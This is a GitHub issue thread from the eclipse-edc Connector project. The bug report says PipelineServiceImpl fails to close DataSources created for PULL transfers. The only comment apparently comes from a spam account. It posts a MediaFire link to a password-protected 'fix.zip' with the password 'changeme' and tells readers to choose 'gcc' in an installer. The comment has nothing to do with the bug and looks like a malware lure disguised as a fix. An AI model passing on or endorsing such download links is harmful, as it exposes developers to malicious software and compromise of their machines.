### ISSUE TITLE
`PipelineServiceImpl` does not close `DataSource`s created for PULL transfers

### ISSUE THREAD

**Issue by ndr-brt** [eclipse-edc/Connector#4438]
# Bug Report

## Describe the Bug

`PipelineServiceImpl` does not close `DataSource`s created for PULL transfers

### Expected Behavior

To close them

### Observed Behavior

In a PULL transfer every call to the public endpoint causes a new `DataSource` to be created

## Context Information

Version: main branch

## Detailed Description

_If applicable, add screenshots and logs to help explain your problem._

## Possible Implementation

_You already know the root cause of the erroneous state and how to fix it? Feel free to share your thoughts._

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
